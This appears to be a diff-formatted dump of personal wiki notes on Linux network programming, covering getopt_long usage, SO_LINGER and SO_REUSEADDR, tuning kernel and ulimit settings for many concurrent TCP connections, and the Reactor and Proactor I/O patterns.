{ "love", required_argument, NULL, 'l' },
|
||||
{ 0, 0, 0, 0},
|
||||
};
|
||||
|
||||
int main(int argc, char *argv[])
|
||||
{
|
||||
int c;
|
||||
|
||||
while((c = getopt_long(argc, argv, ":l:", longopts, NULL)) != -1){ /* optstring should list only the options whose option entry returns a character; entries that store into a flag and return 0 need not be listed */
|
||||
switch (c){
|
||||
case 'l':
|
||||
l_opt_arg = optarg;
|
||||
printf("Our love is %s!\n", l_opt_arg);
|
||||
break;
|
||||
case 0:
printf("getopt_long() set variable: do_name = %d\n", do_name);
printf("getopt_long() set variable: do_gf_name = %d\n", do_gf_name);
break;
}
}
return 0;
}

Before testing, let us review the description of the flag pointer in the option structure.

If this pointer is NULL, getopt_long() returns the value of the structure's val field. If it is not NULL, getopt_long() stores the value of val in the variable it points to and returns 0. If flag is not NULL but the long option is never found, the variable it points to is left unchanged.

Now test it:

$ ./long_opt_demo --name
getopt_long() set variable: do_name = 1
getopt_long() set variable: do_gf_name = 0

$ ./long_opt_demo --gf_name
getopt_long() set variable: do_name = 0
getopt_long() set variable: do_gf_name = 1

$ ./long_opt_demo --love forever
Our love is forever!

$ ./long_opt_demo -l forever
Our love is forever!
|
||||
|
||||
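After these tests the behavior should be clearer. That ends the discussion of flag and val. The return values of getopt_long() are summarized below:

Return value    Meaning
0               getopt_long() set a flag variable to the val field of the matching option entry; do not define a long option of your own that returns 0.
1               returned for each non-option command-line argument when optstring begins with '-'; optarg points to that argument.
'?'             invalid option
':'             missing option argument
'x'             the option character 'x'
-1              end of option parsing

From a practical standpoint, we would rather have every long option correspond to a short option. In that case, simply set flag to NULL in the option structure and set val to the short option character that corresponds to the long option. The program in Listing 5 above, for example, can be modified as follows.

Listing 6: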
|
||||
|
||||
#include <stdio.h>
|
||||
#include <getopt.h>
|
||||
|
||||
int do_name, do_gf_name;
|
||||
char *l_opt_arg;
|
||||
|
||||
struct option longopts[] = {
|
||||
{ "name", no_argument, NULL, 'n' },
|
||||
{ "gf_name", no_argument, NULL, 'g' },
|
||||
{ "love", required_argument, NULL, 'l' },
|
||||
{ 0, 0, 0, 0},
|
||||
};
|
||||
|
||||
int main(int argc, char *argv[])
|
||||
{
|
||||
int c;
|
||||
|
||||
while((c = getopt_long(argc, argv, ":ngl:", longopts, NULL)) != -1){
|
||||
switch (c){
|
||||
case 'n':
|
||||
printf("My name is LYR.\n");
|
||||
break;
|
||||
case 'g':
|
||||
printf("Her name is BX.\n");
|
||||
break;
|
||||
case 'l':
|
||||
l_opt_arg = optarg;
|
||||
printf("Our love is %s!\n", l_opt_arg);
|
||||
break;
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
Test results:
|
||||
|
||||
$ ./long_opt_demo --name --gf_name --love forever
|
||||
My name is LYR.
|
||||
Her name is BX.
|
||||
Our love is forever!
|
||||
|
||||
$ ./long_opt_demo -ng -l forever
|
||||
My name is LYR.
|
||||
Her name is BX.
|
||||
Our love is forever!
|
||||
|
||||
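9. Using GNU getopt() or getopt_long() on platforms other than Linux

Simply copy the source files from a GNU program or from the CVS archive of the GNU C Library (glibc) (http://sourceware.org/glibc/). The files needed are getopt.h, getopt.c, and getopt1.c; add them to your project. It is also advisable to include the file COPYING.LIB in your project, because it contains the full text of the GNU LGPL.

10. Conclusion

A program needs to be able to process its options and arguments quickly, without costing the developer much time. This is a primary task for GUI (graphical user interface) programs and CUI (command-line interface) programs alike; they differ only in how it is done. A GUI interacts through graphical controls such as menus and dialog boxes, whereas a CUI interacts through plain text. During development, a CUI is the first choice for many test programs.

getopt() is a standard library call that lets you step through command-line arguments and detect options (with or without attached arguments) using a straightforward while/switch construct. Its relative getopt_long() handles the more descriptive long options with almost no extra work, which makes it very popular with developers.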
|
||||
|
||||
@@ -0,0 +1,93 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-03T21:35:23+08:00
|
||||
|
||||
====== Linux Network Programming: the SO_LINGER and SO_REUSEADDR Socket Options ======

Created Friday 03 June 2011

Linux network programming offers many socket options. Two of the more important ones are SO_LINGER (which applies only to TCP and SCTP) and SO_REUSEADDR.

SO_LINGER

By default, close() on a socket returns immediately; if data remains in the send buffer, the system tries to deliver it to the peer afterwards.

The SO_LINGER option changes this default behavior. The structure associated with SO_LINGER is:
|
||||
|
||||
|
||||
|
||||
#include <sys/socket.h>
struct linger {
    int l_onoff;   /* 0 = off, nonzero = on */
    int l_linger;  /* linger time, in seconds */
};
|
||||
|
||||
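After setsockopt is called, the effect of the option depends on the values of l_onoff and l_linger in the linger structure:

l_onoff = 0

When l_onoff is 0, SO_LINGER is turned off and TCP or SCTP keeps the default behavior: close returns immediately. The value of l_linger is ignored.

l_onoff nonzero, l_linger = 0

When close is called, the TCP connection is aborted immediately: unsent data in the send buffer is discarded and an RST is sent to the peer. Note that because the connection is not terminated with the normal four-segment close, it does not pass through the TIME_WAIT state, so data from the old connection may be confused with that of a newly established connection. For details see my previous article, "TIME_WAIT State in Linux Network Programming".

l_onoff and l_linger both nonzero

In this case the return of close is delayed. When close is called to close the socket, the kernel lingers: if unsent data remains in the send buffer, the process is put to sleep until one of the following happens:

1) all data in the send buffer has been sent and acknowledged by the peer TCP (this acknowledgment does not mean that the peer application has received the data; see the discussion of shutdown below);
2) the linger time expires, after which any data remaining in the send buffer is discarded.

In both cases 1) and 2), if the socket has been set to O_NONBLOCK, the program does not wait for close to complete, and any data remaining in the send buffer is discarded. We therefore need to check the return value of close: if close returns before all the data has been sent and before the linger time has expired, it fails with the error EWOULDBLOCK.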
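The three combinations of l_onoff and l_linger described above can be selected with a small helper such as the following. This is a minimal sketch, not code from the original article; the function name set_linger is an assumption made for illustration.

```c
#include <assert.h>
#include <sys/socket.h>

/*
 * Enable or disable SO_LINGER on a socket (hypothetical helper).
 * onoff == 0: default close() behaviour; seconds is ignored.
 * onoff != 0, seconds == 0: close() aborts the connection.
 * onoff != 0, seconds > 0: close() may block for up to `seconds`.
 * Returns 0 on success, -1 on error (errno is set by setsockopt).
 */
int set_linger(int fd, int onoff, int seconds)
{
    struct linger lg;

    assert(seconds >= 0);
    lg.l_onoff = onoff;
    lg.l_linger = seconds;
    return setsockopt(fd, SOL_SOCKET, SO_LINGER, &lg, sizeof(lg));
}
```

A caller that wants the lingering close would call set_linger(fd, 1, 5) before close(fd) and then check the return value of close, as the text recommends.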
|
||||
|
||||
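Some examples illustrate this:

A. Default close behavior: return immediately

{{./1.jpg}}

Here close returns immediately; if data remains in the send buffer, the kernel continues to send it after close has returned. Because we do not wait for the ACK from the peer TCP, we do not know whether the peer has received the data. The TCP connection is terminated with the normal four-segment close and passes through TIME_WAIT.

B. l_onoff nonzero and l_linger a positive integer

{{./2.jpg}}

In this case close returns only after the peer TCP's ACK has been received (provided l_linger has not expired first). This ACK guarantees only that the peer TCP has received the data, not that the peer application has read it.

C. l_linger set too small

{{./3.jpg}}

Here l_linger is so small that close returns before all the data in the send buffer has been sent. The connection is then terminated much as with l_linger = 0: not by the normal four-segment close, so the connection does not enter TIME_WAIT, and the client sends an RST to the server.

D. shutdown, waiting for the application to read the data

{{./4.jpg}}

Compare with B: after calling shutdown we immediately call read, which blocks until the peer's FIN arrives; that is, read returns only after the server application has called close. Once the server application has read the client's data and FIN, the server enters the CLOSE_WAIT state (see my post "TCP State Transitions in Linux Network Programming"). To tear down the connection, the server application then calls close, which sends a FIN to the client. At that point the server application has necessarily read the data and the FIN sent by the client, and the client's read returns on receiving the server's FIN. shutdown therefore lets us be sure that the server application has read the data, not merely that the server TCP has received it.

The shutdown arguments are:

SHUT_RD: the receive buffer of the side that calls shutdown is discarded and no more data can be received, but data can still be sent, and data in the send buffer will still go out.

SHUT_WR: the side that calls shutdown can no longer send data but can still receive. send can no longer be called, but data already in the send buffer will still be sent.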
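The shutdown-then-read sequence of example D can be sketched as below. The function name close_after_peer is hypothetical, and the sketch assumes the application protocol in which the peer closes its side only after it has read everything up to our FIN.

```c
#include <assert.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Half-close `fd` for writing, then read until the peer closes its side.
 * Returns the number of bytes the peer sent before end of file, or -1 on
 * error. Data read here is simply discarded.
 */
ssize_t close_after_peer(int fd)
{
    char buf[512];
    ssize_t n, total = 0;

    assert(fd >= 0);
    if (shutdown(fd, SHUT_WR) == -1)   /* FIN goes out after pending data */
        return -1;
    for (;;) {
        n = read(fd, buf, sizeof(buf));
        if (n > 0) {
            total += n;                /* late data from the peer */
            continue;
        }
        if (n == 0)
            break;                     /* end of file: peer closed its side */
        if (errno == EINTR)
            continue;                  /* interrupted, retry */
        close(fd);
        return -1;
    }
    close(fd);
    return total;
}
```

Unlike a lingering close, this waits for an event generated by the peer application (its own close), which is why it says more than a TCP-level ACK does.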
|
||||
|
||||
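SO_REUSEADDR and SO_REUSEPORT

Recently, in the Linux section of CSDN, someone asked why a server could not accept connections right after being restarted and only worked again after a while. I can think of two possible causes. One is that the server's connection is still in the TIME_WAIT state, in which case one has to wait 2MSL before connecting again; for details see my other article, "TIME_WAIT State in Linux Network Programming".

The other is that SO_REUSEADDR was not set. I will not repeat the discussion of TIME_WAIT here and will talk about SO_REUSEADDR instead.

SO_REUSEADDR allows a server to bind to a port and listen on it even if that port is already being used by an existing connection.

We usually run into this in the following situation:

A listening server has been started.
When a client requests a connection, the server spawns a child process to handle that client.
The server's main process terminates, but the child is still using the connection to serve the client. Although the parent has terminated, the child has not, so the socket's reference count has not dropped to 0 and the socket is not closed.
The server program is restarted.

By default, when the restarted server calls socket, bind, and then listen, it fails because the port is in use. With SO_REUSEADDR set, the restart succeeds. Every TCP server should therefore set this option so that it can cope with restarts.

SO_REUSEADDR also allows several sockets to bind to the same port as long as each binds a different IP address. The wildcard address can be bound as well, but it is best to bind the specific addresses first and the wildcard last, so that the system does not refuse the bind. In short, SO_REUSEADDR lets multiple servers bind to the same port provided they specify different IP addresses, but it must be set before bind is called. In TCP, binding an IP address and port that are already bound is never allowed; in UDP it is.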
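The requirement that SO_REUSEADDR be set before bind can be sketched as follows. The function listen_reuseaddr and its parameters are hypothetical; for simplicity the sketch binds the wildcard address, whereas a real server might bind a specific address as discussed above.

```c
#include <assert.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/*
 * Create a TCP listening socket on the wildcard address with SO_REUSEADDR
 * set before bind(). port == 0 lets the kernel pick a free port.
 * Returns the listening descriptor, or -1 on error.
 */
int listen_reuseaddr(unsigned short port, int backlog)
{
    struct sockaddr_in addr;
    int on = 1;
    int fd;

    assert(backlog > 0);
    fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd == -1)
        return -1;
    /* Must come before bind(); setting it afterwards does not help. */
    if (setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on)) == -1)
        goto fail;

    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    if (bind(fd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
        goto fail;
    if (listen(fd, backlog) == -1)
        goto fail;
    return fd;

fail:
    close(fd);
    return -1;
}
```

A restarted server would call this with its fixed service port; the option lets the bind succeed even while old connections on that port still exist.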
|
||||
|
63
Zim/Programme/APUE/Linux配置支持高并发TCP连接(socket最大连接数).txt
Normal file
@@ -0,0 +1,63 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-08-06T20:20:11+08:00
|
||||
|
||||
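====== Configuring Linux for High-Concurrency TCP Connections (Maximum Number of Sockets) ======

Created Saturday 06 August 2011

===== 1. Changing the limit on the number of files a user process may open =====

On Linux, whether you are writing a client or a server, the maximum number of concurrent TCP connections is bounded by the system's __limit on the number of files a single user process may have open at once__ (the system creates a socket handle for every TCP connection, and every socket handle is also a file handle). Use the ulimit command to see the limit for the current user's processes:

[speng@as4 ~]$ ulimit -n
1024

This means that each process of the current user may have at most 1024 files open at once. From these 1024 we must subtract the files every process necessarily has open: standard input, standard output, standard error, the server's listening socket, UNIX domain sockets for inter-process communication, and so on. That leaves roughly 1024 - 10 = 1014 descriptors for client socket connections. In other words, by default a Linux-based communication program can handle at most about 1014 concurrent TCP connections.

A program that needs to support more concurrent TCP connections must change the soft limit and the hard limit that Linux places on the number of files the current user's processes may have open. The soft limit is the value the kernel actually enforces for a process; the hard limit is the ceiling up to which an unprivileged process may raise its soft limit. The soft limit is always less than or equal to the hard limit.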
|
||||
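The simplest way to change these limits is the ulimit command:

[speng@as4 ~]$ ulimit -n

In this command, the number given after -n is the maximum number of files a single process may have open. If the system replies with something like "Operation not permitted", the change failed, because the value given exceeds the soft or hard limit that Linux imposes on this user. In that case the soft and hard limits themselves must be changed.

Step 1: edit /etc/security/limits.conf and add the following lines:

speng soft nofile 10240
speng hard nofile 10240

Here speng names the user whose open-file limit is to be changed ('*' can be used to change the limit for all users); soft or hard says whether the soft or the hard limit is being changed; and 10240 is the new limit, that is, the maximum number of open files (note that the soft limit must be less than or equal to the hard limit). Save the file.

Step 2: edit /etc/pam.d/login and add the following line:

session required /lib/security/pam_limits.so

This tells Linux that, after a user has logged in, the pam_limits.so module should be called to set the system's limits on the resources the user may use (including the maximum number of open files). pam_limits.so reads these limits from /etc/security/limits.conf. Save the file.

Step 3: __check the system-wide limit on the number of open files__ with the following command:

[speng@as4 ~]$ cat /proc/sys/fs/file-max
12158

This shows that this Linux system allows at most 12158 files to be open at once (the total over all users). It is a system-wide hard limit, and no per-user open-file limit should exceed it. The kernel normally computes this value at boot time from the available hardware resources, and it should not be changed without a specific need, such as wanting a per-user limit larger than this value. To change it, edit the /etc/rc.local script and add the following line:

echo 22158 > /proc/sys/fs/file-max

This forces the system-wide open-file limit to 22158 once Linux has finished booting. Save the file.

After completing these steps, reboot the system. In most cases the maximum number of files that a single process of the given user may have open is now set to the specified value. If ulimit -n still shows a limit lower than the one configured above, the cause may be that the login script /etc/profile already restricts the number of open files with a ulimit -n command. A value set with ulimit -n can afterwards only be changed to a value less than or equal to the one set previously, so the limit cannot be raised with this command. If this is the problem, open /etc/profile, look for a ulimit -n command that restricts the number of open files, and either delete that line or change its value to a suitable one; then save the file and have the user log out and log in again.

With these steps, the system limits on the number of open files no longer stand in the way of a program that handles high-concurrency TCP connections.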
|
||||
|
||||
|
||||
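===== 2. Changing the kernel's network limits on TCP connections (compare the next article, "Tuning kernel parameters") =====

When writing a client on Linux that supports high-concurrency TCP connections, you may find that even after the limit on open files has been lifted, no new TCP connection can be established once the number of concurrent connections reaches a certain level. There are several possible causes.

==== The first possible cause is that the Linux kernel limits the range of local port numbers. ====

Analyzing further why the TCP connection cannot be established, we find that connect() fails and the system error message is "Can't assign requested address". If we watch the network with tcpdump at the same time, we see no SYN packets from the client at all. This shows that the limit lies in the local Linux kernel. The root cause is that the kernel's TCP/IP implementation **restricts the range of local port numbers used by all** __client__ **TCP connections in the system** (for example, the kernel may limit local ports to the range 1024~32768). When too many client TCP connections exist at once, each of them occupying a unique local port number from this range, and the existing connections have used up all the local ports, no local port can be allocated for a new client connection; connect() then fails and the error message is set to "Can't assign requested address". The logic can be found in the Linux kernel source; in a 2.6 kernel, for example, see the following function in tcp_ipv4.c:

static int tcp_v4_hash_connect(struct sock *sk)

Note how this function uses the variable __sysctl_local_port_range__. That variable is initialized in the following function in tcp.c:

void __init tcp_init(void)

The local port range compiled into the kernel by default may be too small, so it needs to be changed.

Step 1: edit /etc/sysctl.conf and add the following line:

net.ipv4.ip_local_port_range = 1024 65000

This sets the local port range to 1024~65000. Note that the lower bound must be greater than or equal to 1024 and the upper bound less than or equal to 65535. Save the file.

Step 2: run the sysctl command:

[speng@as4 ~]$ sysctl -p

If the system reports no error, the new local port range has been set. With the range above, a single process can in theory establish a little over 60000 client TCP connections at once.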
|
||||
|
||||
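==== The second possible cause is that the kernel's IP_TABLE firewall limits the number of TCP connections it tracks. ====

In this case the program appears to block in connect(), as if it had hung, and tcpdump again shows no SYN packets from the client. The IP_TABLE firewall **tracks the state of every TCP connection** in the kernel and keeps the tracking information in the conntrack database in kernel memory. This database has a limited size; when there are too many TCP connections it fills up, IP_TABLE cannot create a tracking entry for the new connection, and the program appears to block in connect(). The kernel's limit on the number of tracked TCP connections must then be raised, in much the same way as the local port range:

Step 1: edit /etc/sysctl.conf and add the following line:

__net.ipv4.ip_conntrack_max__ = 10240

This sets the maximum number of tracked TCP connections to 10240. Keep this value as small as possible to save kernel memory.

Step 2: run the sysctl command:

[speng@as4 ~]$ sysctl -p

If the system reports no error, the new limit on tracked TCP connections has been set. With the value above, a single process can in theory establish a little over 10000 client TCP connections at once.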
|
||||
|
||||
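===== 3. Using programming techniques that support high-concurrency network I/O =====

A high-concurrency TCP application on Linux must use a suitable network I/O technique and I/O event dispatching mechanism.

The available I/O techniques are synchronous I/O, non-blocking synchronous I/O (also called reactive I/O), and asynchronous I/O. Under high TCP concurrency, synchronous I/O seriously blocks the program unless a thread is created for the I/O of every TCP connection, and too many threads in turn impose a huge scheduling overhead on the system. **Synchronous I/O is therefore not advisable under high TCP concurrency**; consider non-blocking synchronous I/O or asynchronous I/O instead. Non-blocking synchronous I/O techniques include select(), poll(), and epoll. Asynchronous I/O means using AIO.

As for the I/O event dispatching mechanism, **select() is unsuitable** because the number of concurrent connections it supports is limited (usually to fewer than 1024). If performance matters, poll() is unsuitable too: although it supports a higher number of concurrent TCP connections, it works by polling, so it becomes quite inefficient at high concurrency, and I/O events may be dispatched unevenly, starving the I/O on some TCP connections. epoll and AIO do not have these problems (the AIO implementation in early Linux kernels created a kernel thread for every I/O request, which itself performed badly with many concurrent TCP connections, but the implementation has been improved in recent kernels).

In summary, a Linux application that supports high-concurrency TCP connections __should use epoll or AIO wherever possible__ to handle the I/O on its concurrent TCP connections, which gives the program an effective I/O foundation for high concurrency.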
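As a rough illustration of the epoll interface recommended above, the sketch below registers a set of descriptors and waits for one of them to become readable. The function wait_readable is a hypothetical name, and for brevity the sketch creates and destroys the epoll instance on every call; a real server would create it once and keep it for the lifetime of the event loop.

```c
#include <assert.h>
#include <sys/epoll.h>
#include <unistd.h>

/*
 * Wait up to timeout_ms for any of the `nfds` descriptors to become
 * readable. Returns one ready descriptor, or -1 on timeout or error.
 */
int wait_readable(const int *fds, int nfds, int timeout_ms)
{
    struct epoll_event ev, ready;
    int i, n, ep, result = -1;

    assert(fds != NULL && nfds > 0);
    ep = epoll_create1(0);
    if (ep == -1)
        return -1;
    for (i = 0; i < nfds; i++) {
        ev.events = EPOLLIN;           /* interested in readability only */
        ev.data.fd = fds[i];
        if (epoll_ctl(ep, EPOLL_CTL_ADD, fds[i], &ev) == -1)
            goto out;
    }
    n = epoll_wait(ep, &ready, 1, timeout_ms);
    if (n == 1)
        result = ready.data.fd;        /* descriptor that has data */
out:
    close(ep);
    return result;
}
```

Unlike select(), the set of descriptors is not limited by FD_SETSIZE, and epoll_wait reports only the descriptors that are actually ready.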
|
||||
@@ -0,0 +1,21 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-08-06T20:26:48+08:00
|
||||
|
||||
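====== The "theoretical" maximum number of connections for a single server program is "65535" ======

Created Saturday 06 August 2011

A misconception: the "theoretical" maximum number of connections a single server program can handle is "65535"

Note that I have put two terms in quotation marks: "theoretical" and "65535". I stress "theoretical" to make clear what people who hold this misconception mean: that the value can never be exceeded, that it is set in stone. As for the number 65535, many people take it for granted that it comes from the maximum port number. It is true that the largest TCP port number is 65535. But that does not mean a server can accept only that many connections; people confuse the two concepts because they lack a deeper understanding of sockets and ports. Recall the sequence of steps by which a server provides service: the server creates a listening socket -> binds it to the port on which it serves -> starts to listen -> a client connects to that port -> accept creates a new socket for the new client -> data is exchanged with the client over this new socket. In this whole sequence, the all-important "port number", with its maximum of 65535, is used exactly once, at bind time! The sockets created afterwards are, to put it plainly, nothing more than HANDLEs on which network I/O can be performed. Their involvement with the port number is limited to bind and to identifying the port a client connects to; once accept has produced a socket, the port number no longer matters to the communication between the server and the new client. And is the maximum number of connections a server can carry not simply the number of client sockets it can create? If that number has nothing to do with the port number, where would a "theoretical" limit of 65535 come from? I put "theoretical" in quotation marks once more because some operating systems do set the maximum number of sockets to 65535 in their default configuration, but that value can be changed!

A port number is just a street address. You would not issue 100,000 street numbers just because the Bird's Nest stadium holds 100,000 spectators; imagine how thick the phone book would be.

What you issue is 100,000 seat numbers.

Below is a rough performance comparison of various I/O models.

I/O model    attempts/successful connections
block: 7000/1008
noBlock: 7000/4011
WSAAsyncSelect: 7000/1956
WSAEventSelect: 7000/6999
Overlapped: 7000/5558
completion port: 7000/7000, 50000/4997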
|
||||
197
Zim/Programme/APUE/Proactor和Reactor模式.txt
Normal file
@@ -0,0 +1,197 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2012-02-17T11:15:37+08:00
|
||||
|
||||
====== The Proactor and Reactor Patterns ======
|
||||
Created Friday 17 February 2012
|
||||
http://www.cppblog.com/kevinlynx/archive/2008/06/06/52356.html
|
||||
|
||||
Kevin Lynx
|
||||
|
||||
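Proactor and Reactor are both design patterns in concurrent programming. As I see it, both are __used to dispatch/demultiplex I/O operation events__. The I/O events here are __I/O operations such as read/write__. "Dispatch/demultiplex" means __notifying upper-layer modules of individual I/O events__. The difference between the two patterns is that **Proactor is used with asynchronous I/O and Reactor with synchronous I/O**.

Some key excerpts: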
|
||||
|
||||
"
|
||||
Two patterns that involve **event demultiplexors** are called Reactor and Proactor [1]. The Reactor patterns
|
||||
involve synchronous I/O, whereas the Proactor pattern involves asynchronous I/O.
|
||||
"
|
||||
|
||||
The rough model of the two patterns is clear from the following text:

"
An example will help you understand the difference between Reactor and Proactor. We will focus on the read operation here, as the write implementation is similar. Here's a read in Reactor:

* An __event handler__ declares interest in I/O events that indicate readiness for read on a particular socket;
* The __event demultiplexor__ waits for events;
* An event comes in and **wakes-up the demultiplexor**, and the demultiplexor calls the appropriate handler;
* The event handler performs __the actual read operation__, handles the data read, declares **renewed interest** in I/O events, and returns control to the dispatcher.

By comparison, here is a read operation in Proactor (true async):

* A __handler__ initiates an asynchronous read operation (note: the OS must support asynchronous I/O). In this case, the handler does not care about I/O readiness events, but instead registers interest in **receiving completion events**;
* The __event demultiplexor__ waits until the operation is completed;
* While the event demultiplexor waits, the OS executes the read operation in **a parallel kernel thread**, puts data into **a user-defined buffer**, and notifies the event demultiplexor that the read is complete;
* The event demultiplexor __calls__ the appropriate handler;
* The event handler handles the data from user defined buffer, starts **a new asynchronous operation**, and returns control to the event demultiplexor.
"
|
||||
|
||||
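As can be seen, what the two patterns have in common is that both deliver notifications of I/O events (telling some module that an I/O operation can be performed or has completed). Structurally they also have __something in common__: the demultiplexor submits the I/O operation (asynchronous case) or queries whether the device is ready (synchronous case), and calls back the handler when the condition is met. The __difference__ is that in the asynchronous case (Proactor) the callback means the I/O operation has already completed, whereas in the synchronous case (Reactor) the callback means the device is ready for an operation (can read or can write), and only then does the handler perform the operation.

A simple reactor written with the **select model** looks roughly like this: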
|
||||
|
||||
///
|
||||
class __handler__
|
||||
{
|
||||
public:
|
||||
virtual void onRead() = 0;
|
||||
virtual void onWrite() = 0;
|
||||
virtual void onAccept() = 0;
|
||||
};
|
||||
|
||||
class __dispatch__
|
||||
{
|
||||
public:
|
||||
void poll()
|
||||
{
|
||||
// add fd in the set.
|
||||
//
|
||||
// poll every fd
|
||||
int c = select( 0, &read_fd, &write_fd, 0, 0 );
|
||||
if( c > 0 )
|
||||
{
|
||||
for each fd in the read_fd_set
|
||||
{ if fd can read
|
||||
_handler->onRead();
|
||||
if fd can accept
|
||||
_handler->onAccept();
|
||||
}
|
||||
|
||||
for each fd in the write_fd_set
|
||||
{
|
||||
if fd can write
|
||||
_handler->onWrite();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
void setHandler( handler *_h )
|
||||
{
|
||||
_handler = _h;
|
||||
}
|
||||
|
||||
private:
|
||||
**handler** *_handler;
|
||||
};
|
||||
|
||||
/// application
|
||||
class MyHandler : public handler
|
||||
{
|
||||
public:
|
||||
void onRead()
|
||||
{
|
||||
}
|
||||
|
||||
void onWrite()
|
||||
{
|
||||
}
|
||||
|
||||
void onAccept()
|
||||
{
|
||||
}
|
||||
};
|
||||
|
||||
|
||||
I found a fairly formal document on the Proactor pattern online; it gives an overall UML class diagram that is quite complete:

{{./proactor_uml_thumb.jpg}}

Based on this diagram I casually wrote some example code:
|
||||
|
||||
class AsyIOProcessor
|
||||
{
|
||||
public:
|
||||
void do_read()
|
||||
{
|
||||
//send read operation to OS
|
||||
// read io finished.and dispatch notification
|
||||
_proactor->dispatch_read();
|
||||
}
|
||||
|
||||
private:
|
||||
__Proactor*__ _proactor;
|
||||
};
|
||||
|
||||
class Proactor
|
||||
{
|
||||
public:
|
||||
void dispatch_read()
|
||||
{
|
||||
_handlerMgr->onRead();
|
||||
}
|
||||
|
||||
private:
|
||||
HandlerManager *_handlerMgr;
|
||||
};
|
||||
|
||||
class HandlerManager
|
||||
{
|
||||
public:
|
||||
typedef __std::list<Handler*>__ HandlerList;
|
||||
|
||||
public:
|
||||
void onRead()
|
||||
{
|
||||
// notify all the handlers.
|
||||
for( HandlerList::iterator it = _handlers.begin(); it != _handlers.end(); ++it )
(*it)->onRead();
}

private:
HandlerList _handlers;
|
||||
};
|
||||
|
||||
class Handler
|
||||
{
|
||||
public:
|
||||
virtual void onRead() = 0;
|
||||
};
|
||||
|
||||
// application level handler.
|
||||
class MyHandler : public Handler
|
||||
{
|
||||
public:
|
||||
void onRead()
|
||||
{
|
||||
//
|
||||
}
|
||||
};
|
||||
|
||||
|
||||
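With some modification, a Reactor can be adapted into a Proactor. On systems without asynchronous I/O this also hides the underlying implementation, which helps when writing cross-platform code. We only need to wrap the synchronous I/O code inside dispatch (that is, the demultiplexor). The upper layer submits its own buffer to this layer; when this layer detects that the device is ready, instead of calling the handler back immediately as before, it performs the I/O operation itself, places the result in the user's buffer (for a read), and only then calls the handler. To the upper-layer handler this looks just like a proactor. For the detailed technique, see this article.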
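The adaptation described above can be sketched in C with poll() as the readiness mechanism. Everything named here (struct read_request, dispatch_read, record_length) is hypothetical and only illustrates the idea: the dispatcher waits for readiness, performs the read into the user's buffer itself, and then reports completion.

```c
#include <assert.h>
#include <poll.h>
#include <stddef.h>
#include <sys/types.h>
#include <unistd.h>

/* Completion callback: gets the user's buffer and the byte count read. */
typedef void (*read_done_fn)(char *buf, ssize_t n, void *ctx);

/* One pending "asynchronous" read request (hypothetical type). */
struct read_request {
    int fd;
    char *buf;          /* buffer supplied by the upper layer */
    size_t len;
    read_done_fn done;  /* called once the data is in buf */
    void *ctx;
};

/* Example handler: stores the number of bytes read into *ctx. */
void record_length(char *buf, ssize_t n, void *ctx)
{
    (void)buf;
    *(ssize_t *)ctx = n;
}

/*
 * Emulated Proactor step: wait for readiness (the Reactor part), do the
 * read on the handler's behalf, then report completion.
 * Returns 1 if the callback ran, 0 on timeout, -1 on error.
 */
int dispatch_read(struct read_request *req, int timeout_ms)
{
    struct pollfd pfd;
    ssize_t n;
    int rc;

    assert(req != NULL && req->buf != NULL && req->done != NULL);
    pfd.fd = req->fd;
    pfd.events = POLLIN;
    pfd.revents = 0;

    rc = poll(&pfd, 1, timeout_ms);
    if (rc <= 0)
        return rc;                         /* 0: timeout, -1: error */
    n = read(req->fd, req->buf, req->len); /* the I/O happens here */
    if (n < 0)
        return -1;
    req->done(req->buf, n, req->ctx);      /* completion notification */
    return 1;
}
```

From the handler's point of view the data is already in its buffer when the callback runs, which is the Proactor contract, even though the operating system only provided readiness notification.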
|
||||
|
||||
|
||||
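I have recently been reading the spserver code, and seeing others mention all these patterns of concurrent systems made me a little envious, which is why I set out to fill this gap in my knowledge. Now that I know what the leader/follower pattern, reactor, proactor, and multiplexing are, the network library I have in mind is becoming clearer and clearer.

I have also done some outlandish things lately. I wrote the fabled byte-stream encoding with templates, which kept it extensible and saved a lot of code. For efficiency I wrote a static array container (really just template <typename _Tp, std::size_t size> class static_array { _Tp _con[size]), added iterators, and followed STL conventions so that it works with the STL generic algorithms; I am rather pleased with it. With the base modules in place, I parsed the messages of the company's server network module. Am I really going to rewrite my authentication server on top of my own network module? In another tool I wrote for the company, fed up with the growing amount of duplicated code, I wrote a few macros and really did get the code generated automatically :D.

The pursuit of elegant code has truly become a habit. = =|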
|
||||
@@ -0,0 +1,250 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2012-02-27T21:44:44+08:00
|
||||
|
||||
====== Comparing Two High-Performance IO Design Patterns ======
|
||||
Created Monday 27 February 2012
|
||||
|
||||
http://www.artima.com/articles/io_design_patterns.html
|
||||
|
||||
by Alexander Libman with Vladimir Gilbourd November 25, 2005
|
||||
|
||||
===== Summary =====
|
||||
This article investigates and compares different __design patterns__ of high performance __TCP-based__ servers. In addition to existing approaches, it proposes a scalable single-codebase, multi-platform solution (with code examples) and describes its fine-tuning on different platforms. It also compares performance of Java, C# and C++ implementations of proposed and existing solutions.
|
||||
|
||||
**System I/O **can be __blocking__, or __non-blocking synchronous__, or __non-blocking asynchronous__ [1, 2]. Blocking I/O means that the calling system does **not return control to the caller **until the operation is finished. As a result, the caller is blocked and cannot perform other activities during that time. Most important, the caller thread__ cannot be reused for other request processing__ while waiting for the I/O to complete, and becomes __a wasted resource__ during that time. For example, a read() operation on a socket in blocking mode will not return control if the socket buffer is empty until** some data becomes available**.
|
||||
|
||||
